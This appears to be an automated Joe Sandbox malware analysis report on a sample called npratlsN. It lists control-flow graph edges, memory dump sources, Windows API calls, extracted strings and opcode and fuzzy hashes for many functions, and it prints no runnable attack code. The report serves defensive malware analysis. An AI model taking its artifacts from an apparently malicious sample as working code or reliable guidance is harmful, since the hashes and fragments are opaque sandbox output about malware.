                                                                                                                                                                          control_flow_graph 1037 2b7c6581-2b7c65b5 1038 2b7c65bb-2b7c65de 1037->1038 1039 2b7c69e4-2b7c69e8 1037->1039 1048 2b7c668c-2b7c6690 1038->1048 1049 2b7c65e4-2b7c65f1 1038->1049 1040 2b7c69ea-2b7c69fe 1039->1040 1041 2b7c6a01-2b7c6a0f 1039->1041 1046 2b7c6a80-2b7c6a95 1041->1046 1047 2b7c6a11-2b7c6a26 1041->1047 1055 2b7c6a9c-2b7c6aa9 1046->1055 1056 2b7c6a97-2b7c6a9a 1046->1056 1057 2b7c6a2d-2b7c6a3a 1047->1057 1058 2b7c6a28-2b7c6a2b 1047->1058 1052 2b7c66d8-2b7c66e1 1048->1052 1053 2b7c6692-2b7c66a0 1048->1053 1062 2b7c6600 1049->1062 1063 2b7c65f3-2b7c65fe 1049->1063 1059 2b7c6af7 1052->1059 1060 2b7c66e7-2b7c66f1 1052->1060 1053->1052 1067 2b7c66a2-2b7c66bd 1053->1067 1064 2b7c6aab-2b7c6ae6 1055->1064 1056->1064 1065 2b7c6a3c-2b7c6a7d 1057->1065 1058->1065 1068 2b7c6afc-2b7c6b0f 1059->1068 1060->1039 1066 2b7c66f7-2b7c6700 1060->1066 1069 2b7c6602-2b7c6604 1062->1069 1063->1069 1108 2b7c6aed-2b7c6af4 1064->1108 1072 2b7c670f-2b7c671b 1066->1072 1073 2b7c6702-2b7c6707 1066->1073 1092 2b7c66bf-2b7c66c9 1067->1092 1093 2b7c66cb 1067->1093 1069->1048 1076 2b7c660a-2b7c666c 1069->1076 1072->1068 1074 2b7c6721-2b7c6727 1072->1074 1073->1072 1080 2b7c672d-2b7c673d 1074->1080 1081 2b7c69ce-2b7c69d2 1074->1081 1121 2b7c666e 1076->1121 1122 2b7c6672-2b7c6689 1076->1122 1094 2b7c673f-2b7c674f 1080->1094 1095 2b7c6751-2b7c6753 1080->1095 1081->1059 1085 2b7c69d8-2b7c69de 1081->1085 1085->1039 1085->1066 1096 2b7c66cd-2b7c66cf 1092->1096 1093->1096 1097 2b7c6756-2b7c675c 1094->1097 1095->1097 1096->1052 1103 2b7c66d1 1096->1103 1097->1081 1104 2b7c6762-2b7c6771 1097->1104 1103->1052 1105 2b7c681f-2b7c684a call 2b7c63c8 * 2 1104->1105 1106 2b7c6777 1104->1106 1123 2b7c6934-2b7c694e 1105->1123 1124 2b7c6850-2b7c6854 1105->1124 1110 2b7c677a-2b7c678b 1106->1110 1110->1068 1112 2b7c6791-2b7c67a3 1110->1112 1112->1068 1115 2b7c67a9-2b7c67c3 call 2b7c6b60 1112->1115 1117 2b7c67c9-2b7c67d9 1115->1117 1117->1081 1120 2b7c67df-2b7c67e2 1117->1120 1125 2b7c67ec-2b7c67ef 1120->1125 1126 2b7c67e4-2b7c67ea 1120->1126 1121->1122 1122->1048 1123->1039 1144 2b7c6954-2b7c6958 1123->1144 1124->1081 1127 2b7c685a-2b7c685e 1124->1127 1125->1059 1128 2b7c67f5-2b7c67f8 1125->1128 1126->1125 1126->1128 1131 2b7c6886-2b7c688c 1127->1131 1132 2b7c6860-2b7c686d 1127->1132 1133 2b7c67fa-2b7c67fe 1128->1133 1134 2b7c6800-2b7c6803 1128->1134 1136 2b7c688e-2b7c6892 1131->1136 1137 2b7c68c7-2b7c68cd 1131->1137 1147 2b7c687c 1132->1147 1148 2b7c686f-2b7c687a 1132->1148 1133->1134 1135 2b7c6809-2b7c680d 1133->1135 1134->1059 1134->1135 1135->1059 1142 2b7c6813-2b7c6819 1135->1142 1136->1137 1143 2b7c6894-2b7c689d 1136->1143 1139 2b7c68cf-2b7c68d3 1137->1139 1140 2b7c68d9-2b7c68df 1137->1140 1139->1108 1139->1140 1145 2b7c68eb-2b7c68ed 1140->1145 1146 2b7c68e1-2b7c68e5 1140->1146 1142->1105 1142->1110 1149 2b7c68ac-2b7c68c2 1143->1149 1150 2b7c689f-2b7c68a4 1143->1150 1151 2b7c695a-2b7c6964 call 2b7c5258 1144->1151 1152 2b7c6994-2b7c6998 1144->1152 1153 2b7c68ef-2b7c68f8 1145->1153 1154 2b7c6922-2b7c6924 1145->1154 1146->1081 1146->1145 1155 2b7c687e-2b7c6880 1147->1155 1148->1155 1149->1081 1150->1149 1151->1152 1165 2b7c6966-2b7c697b 1151->1165 1152->1108 1157 2b7c699e-2b7c69a2 1152->1157 1160 2b7c68fa-2b7c68ff 1153->1160 1161 2b7c6907-2b7c691d 1153->1161 1154->1081 1162 2b7c692a-2b7c6931 1154->1162 1155->1081 1155->1131 1157->1108 1163 2b7c69a8-2b7c69b5 1157->1163 1160->1161 1161->1081 1168 2b7c69c4 1163->1168 1169 2b7c69b7-2b7c69c2 1163->1169 1165->1152 1174 2b7c697d-2b7c6992 1165->1174 1171 2b7c69c6-2b7c69c8 1168->1171 1169->1171 1171->1081 1171->1108 1174->1039 1174->1152
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
                                                                                                                                                                          • API String ID: 0-1932283790
                                                                                                                                                                          • Opcode ID: c47cfbc40c42e5a90ea5c8fc6ca189b810007c02489eb56ce508f14ed49041ec
                                                                                                                                                                          • Instruction ID: 71d94d1c205cacc525102726c0595bc733a7c979f55d69513c10c64868d6165a
                                                                                                                                                                          • Opcode Fuzzy Hash: c47cfbc40c42e5a90ea5c8fc6ca189b810007c02489eb56ce508f14ed49041ec
                                                                                                                                                                          • Instruction Fuzzy Hash: 20124634A002089FCF15CF69C984A9EBBF2BF88314F108569F55AEB2A1DB31ED45CB50
                                                                                                                                                                          Function 2B7C1C48 Relevance: 8.4, Strings: 6, Instructions: 875COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: Xbq$Xbq$Xbq$Xbq$Xbq$Xbq
                                                                                                                                                                          • API String ID: 0-1317942629
                                                                                                                                                                          • Opcode ID: 757f4cbabd308bdad35a6663c6dd56fb3ea0583af792829c1b779d91d66c478a
                                                                                                                                                                          • Instruction ID: 2cea3011a78e52066c27ecb7a4d790da4470170aeb254474b6d98b848aa7c7ac
                                                                                                                                                                          • Opcode Fuzzy Hash: 757f4cbabd308bdad35a6663c6dd56fb3ea0583af792829c1b779d91d66c478a
                                                                                                                                                                          • Instruction Fuzzy Hash: BE72CF32D062889BCF22DFF495DF15A3F72AF61300B2901DDE9C55B48FD23866148B9A
                                                                                                                                                                          Function 004018F0 Relevance: 6.3, APIs: 5, Instructions: 77stringCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00401906
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00401940
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000001.1851558247.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000008.00000001.1851558247.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000008.00000001.1851558247.000000000043F000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_1_400000_npratlsN.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3322701435-0
                                                                                                                                                                          • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                                                          • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                                                                                                                                          • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                                                          • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8
                                                                                                                                                                          Function 2C96BAC4 Relevance: 6.1, APIs: 4, Instructions: 130threadCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 2C96BB46
                                                                                                                                                                          • GetCurrentThread.KERNEL32 ref: 2C96BB83
                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 2C96BBC0
                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 2C96BC19
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3090259033.000000002C960000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C960000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c960000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Current$ProcessThread
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2063062207-0
                                                                                                                                                                          • Opcode ID: 3cb17149dca91881f54fef0ae0183a2154d7b34a66d4e0f610ff6ed611ae4ad4
                                                                                                                                                                          • Instruction ID: 6508e71fc700aff5cb65eb646b86edf1e2253f4eb0dbeda9f3a2c6dd3e67d44a
                                                                                                                                                                          • Opcode Fuzzy Hash: 3cb17149dca91881f54fef0ae0183a2154d7b34a66d4e0f610ff6ed611ae4ad4
                                                                                                                                                                          • Instruction Fuzzy Hash: B15157B0901349CFDB14CFAAD588BDEBBF5AF88310F208559D419A73A0DB74A944CF65
                                                                                                                                                                          Function 2C96BAC8 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 2C96BB46
                                                                                                                                                                          • GetCurrentThread.KERNEL32 ref: 2C96BB83
                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 2C96BBC0
                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 2C96BC19
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3090259033.000000002C960000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C960000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c960000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Current$ProcessThread
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2063062207-0
                                                                                                                                                                          • Opcode ID: 37b442a77d2dc9ca5e8cea02aa1f79b786ed71a00139930ef8e9e7bb7c51b36f
                                                                                                                                                                          • Instruction ID: 2c4a5c9fb53496c639525d8e7c660f95bc6bc4d08f66f8c4072e7f39f7c729cf
                                                                                                                                                                          • Opcode Fuzzy Hash: 37b442a77d2dc9ca5e8cea02aa1f79b786ed71a00139930ef8e9e7bb7c51b36f
                                                                                                                                                                          • Instruction Fuzzy Hash: 885157B0901349CFDB14CFAAC588BDEBBF5AF88310F208459D419A73A0DB74A944CF65
                                                                                                                                                                          Function 0040AF66 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • _malloc.LIBCMT ref: 0040AF80
                                                                                                                                                                            • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                                                            • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                                                            • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                                                          • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                                                                                                                            • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                                                                                                                          • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000001.1851558247.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000008.00000001.1851558247.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000008.00000001.1851558247.000000000043F000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_1_400000_npratlsN.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1411284514-0
                                                                                                                                                                          • Opcode ID: 2a036851afa6ddc1d7df3bddf1a8d8bff45cbcbf2885913663491285a515d732
                                                                                                                                                                          • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                                                                                                                                          • Opcode Fuzzy Hash: 2a036851afa6ddc1d7df3bddf1a8d8bff45cbcbf2885913663491285a515d732
                                                                                                                                                                          • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E
                                                                                                                                                                          Function 2B7C7F18 Relevance: 4.2, Strings: 3, Instructions: 493COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 4'^q$4'^q$;^q
                                                                                                                                                                          • API String ID: 0-799016360
                                                                                                                                                                          • Opcode ID: b0412aa840ff02f4a5422aaaf166830c17d773cbffb3faca5ec11361c9dfa641
                                                                                                                                                                          • Instruction ID: dbd84926ef9a0bddbd75d60816672dbd39545f48fa43ff07d5baf5793c33bdf6
                                                                                                                                                                          • Opcode Fuzzy Hash: b0412aa840ff02f4a5422aaaf166830c17d773cbffb3faca5ec11361c9dfa641
                                                                                                                                                                          • Instruction Fuzzy Hash: C6F14A313045118FDF059E29C958B3E7BE6AF85B40F1540AEF601CF3A2EA69ED82C791
                                                                                                                                                                          Function 2B7CE398 Relevance: 3.9, Strings: 3, Instructions: 157COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: @>{+$@>{+$@>{+
                                                                                                                                                                          • API String ID: 0-4148728344
                                                                                                                                                                          • Opcode ID: a46bc5eb2faace66302e1dd450825f40be2ecf2734e31f43937313d32c6b3a28
                                                                                                                                                                          • Instruction ID: a7d6a676f91de049454496bcf467724d903a99e472b4a3a426c2b93ec899cb22
                                                                                                                                                                          • Opcode Fuzzy Hash: a46bc5eb2faace66302e1dd450825f40be2ecf2734e31f43937313d32c6b3a28
                                                                                                                                                                          • Instruction Fuzzy Hash: D461F574D01218DFDB14DFB5D954A9EBBB2FF88304F208529E809AB358DB35A986CF41
                                                                                                                                                                          Function 2B7C4DB0 Relevance: 2.8, Strings: 2, Instructions: 270COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: Hbq$Hbq
                                                                                                                                                                          • API String ID: 0-4258043069
                                                                                                                                                                          • Opcode ID: 3d1cb55b0b4691d08a30d12c12c877172c3ebe8aa39290bb001324515d147efa
                                                                                                                                                                          • Instruction ID: bc0192b6494aed2ec3ba64b95905b97e7550273d7e5dc17d8f95b25660559d7d
                                                                                                                                                                          • Opcode Fuzzy Hash: 3d1cb55b0b4691d08a30d12c12c877172c3ebe8aa39290bb001324515d147efa
                                                                                                                                                                          • Instruction Fuzzy Hash: 3891AE357042A48FCB059F78C898A6EBBE2BFC9300F198569F906CB395CB38D941C791
                                                                                                                                                                          Function 2B7C5310 Relevance: 2.7, Strings: 2, Instructions: 231COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: ,bq$,bq
                                                                                                                                                                          • API String ID: 0-2699258169
                                                                                                                                                                          • Opcode ID: 0a67f05e9376fdb77e08fa7aa3b41da7bc8f181b6c11e38d76ad2c34381281ba
                                                                                                                                                                          • Instruction ID: 6e1bb7cfbefe0036d4a85123512aa3173ead92b1b5db56bb7ccba01edbd2e156
                                                                                                                                                                          • Opcode Fuzzy Hash: 0a67f05e9376fdb77e08fa7aa3b41da7bc8f181b6c11e38d76ad2c34381281ba
                                                                                                                                                                          • Instruction Fuzzy Hash: 7D817634A006058FCF04DF69D886A9FBBF2BF89315F648169E505DB362DB32E941CB91
                                                                                                                                                                          Function 2C95DCD0 Relevance: 2.7, Strings: 2, Instructions: 230COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3090164707.000000002C950000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C950000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c950000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: LR^q$LR^q
                                                                                                                                                                          • API String ID: 0-4089051495
                                                                                                                                                                          • Opcode ID: 42cbca71093f626c548f08c611d4964206eda65785bbf576fa2e34ea5a6027d9
                                                                                                                                                                          • Instruction ID: a50eeb5ccddaf22eb0e5bb9c36576133d3b169bb3279f2fb24321a3552ff57e2
                                                                                                                                                                          • Opcode Fuzzy Hash: 42cbca71093f626c548f08c611d4964206eda65785bbf576fa2e34ea5a6027d9
                                                                                                                                                                          • Instruction Fuzzy Hash: 68819D35B011168FCB04DF3DD99495E7BB6EF88744B2181A9E506DB3A1EB30EC06CB95
                                                                                                                                                                          Function 2C897520 Relevance: 2.7, Strings: 2, Instructions: 214COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3089514926.000000002C890000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C890000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c890000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: (&^q$(bq
                                                                                                                                                                          • API String ID: 0-1294341849
                                                                                                                                                                          • Opcode ID: b70126bc3cce090d18bc1a0d98ecbe6bee8591c39b539d0ca7c5c5f1b9699521
                                                                                                                                                                          • Instruction ID: 7d8555358fca0f35dce6188eae054768acbe5c504cf76bada43a236339810eea
                                                                                                                                                                          • Opcode Fuzzy Hash: b70126bc3cce090d18bc1a0d98ecbe6bee8591c39b539d0ca7c5c5f1b9699521
                                                                                                                                                                          • Instruction Fuzzy Hash: 90719031F042199BDB05DFB9C850AAEBBF2AFC5740F248529E515AB380DF30AD46CB95
                                                                                                                                                                          Function 2B7C8AC0 Relevance: 2.7, Strings: 2, Instructions: 162COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 4'^q$4'^q
                                                                                                                                                                          • API String ID: 0-2697143702
                                                                                                                                                                          • Opcode ID: b19093e4facc47143ca0d828d7cc25d10562b1226ce8632951182a623013de88
                                                                                                                                                                          • Instruction ID: acc5da0a0021c93ea670235c963bc4052ea4bbf5ed383aa44c8f22640e9b121e
                                                                                                                                                                          • Opcode Fuzzy Hash: b19093e4facc47143ca0d828d7cc25d10562b1226ce8632951182a623013de88
                                                                                                                                                                          • Instruction Fuzzy Hash: 5E51AD717002449FDB059F69C844B6FBBEAEF88310F04846AF908CB392DB75ED418B91
                                                                                                                                                                          Function 2B7C0012 Relevance: 1.8, Strings: 1, Instructions: 562COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: LR^q
                                                                                                                                                                          • API String ID: 0-2625958711
                                                                                                                                                                          • Opcode ID: 7cda089f83272610dc37d1c21906b16d9f98835a2578d5283b8926ace03450eb
                                                                                                                                                                          • Instruction ID: 651e5848a2e67851a29179a45eac36dee2aceff20d60fed851141c5bbd3ead7e
                                                                                                                                                                          • Opcode Fuzzy Hash: 7cda089f83272610dc37d1c21906b16d9f98835a2578d5283b8926ace03450eb
                                                                                                                                                                          • Instruction Fuzzy Hash: E06212389012AACFCB54EF64D994A9DBBB2FF49300F1091A5D80AA7359DB346D86CF50
                                                                                                                                                                          Function 2B7C0040 Relevance: 1.8, Strings: 1, Instructions: 541COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: LR^q
                                                                                                                                                                          • API String ID: 0-2625958711
                                                                                                                                                                          • Opcode ID: 6707a756fca298622619599e403bed76c1ebcfa22ca6fd60bc194e06ef8a51aa
                                                                                                                                                                          • Instruction ID: 0352d460a85107f04bd9aa9d4e86272af5805b2dae089a30f29eb52d5be8e3b3
                                                                                                                                                                          • Opcode Fuzzy Hash: 6707a756fca298622619599e403bed76c1ebcfa22ca6fd60bc194e06ef8a51aa
                                                                                                                                                                          • Instruction Fuzzy Hash: FE5202389012AACFCB54EF64D994A9DF7B2FF49300F1091A5D80AA7358DB386D86CF54
                                                                                                                                                                          Function 2D024420 Relevance: 1.7, APIs: 1, Instructions: 229COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(?), ref: 2D0246AA
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3091360143.000000002D020000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D020000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2d020000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HandleModule
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4139908857-0
                                                                                                                                                                          • Opcode ID: 2f7ce08b3a3819be0423038b036b9ebf1ac7545e8a2e71209db776a87ccd2940
                                                                                                                                                                          • Instruction ID: 3f737eeea77d57e174f1503d9427a7bf02502ce368bcf3dce717f8688e994cc2
                                                                                                                                                                          • Opcode Fuzzy Hash: 2f7ce08b3a3819be0423038b036b9ebf1ac7545e8a2e71209db776a87ccd2940
                                                                                                                                                                          • Instruction Fuzzy Hash: 7D913670A01B558FDB24CF69D084B9ABBF1FF48304F00892AD58AE7B60DB74E945CB95
                                                                                                                                                                          Function 2D026B8B Relevance: 1.7, APIs: 1, Instructions: 184COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 2D026D51
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3091360143.000000002D020000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D020000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2d020000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 716092398-0
                                                                                                                                                                          • Opcode ID: e282a38bce6328f841188c496954b3a925b7f4249b1ad1e85c28b8e59e240529
                                                                                                                                                                          • Instruction ID: fefe6aeb8a48721f186c7dc4562af04db629a3d3c416dcadb2c52345e8c561b1
                                                                                                                                                                          • Opcode Fuzzy Hash: e282a38bce6328f841188c496954b3a925b7f4249b1ad1e85c28b8e59e240529
                                                                                                                                                                          • Instruction Fuzzy Hash: 9D717AB4D05258DFDF20CFA9D984ADDBBF1BB09300F5091AAE858B7221D770AA85CF45
                                                                                                                                                                          Function 2D026B90 Relevance: 1.7, APIs: 1, Instructions: 182COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 2D026D51
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3091360143.000000002D020000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D020000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2d020000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 716092398-0
                                                                                                                                                                          • Opcode ID: 8ac2273b8fbaa673dbbe238fd52d30585454e9ed7664c399ba1dc04574aad080
                                                                                                                                                                          • Instruction ID: 37ec8d475cc431da864d9015f8f960a0a46a45ad80c4aef156602adcbeed1dcc
                                                                                                                                                                          • Opcode Fuzzy Hash: 8ac2273b8fbaa673dbbe238fd52d30585454e9ed7664c399ba1dc04574aad080
                                                                                                                                                                          • Instruction Fuzzy Hash: 6C717AB4D01258DFDF20CFA9D984ADEBBF1BB09300F5091AAE458B7221D770AA85CF45
                                                                                                                                                                          Function 2C96BD08 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
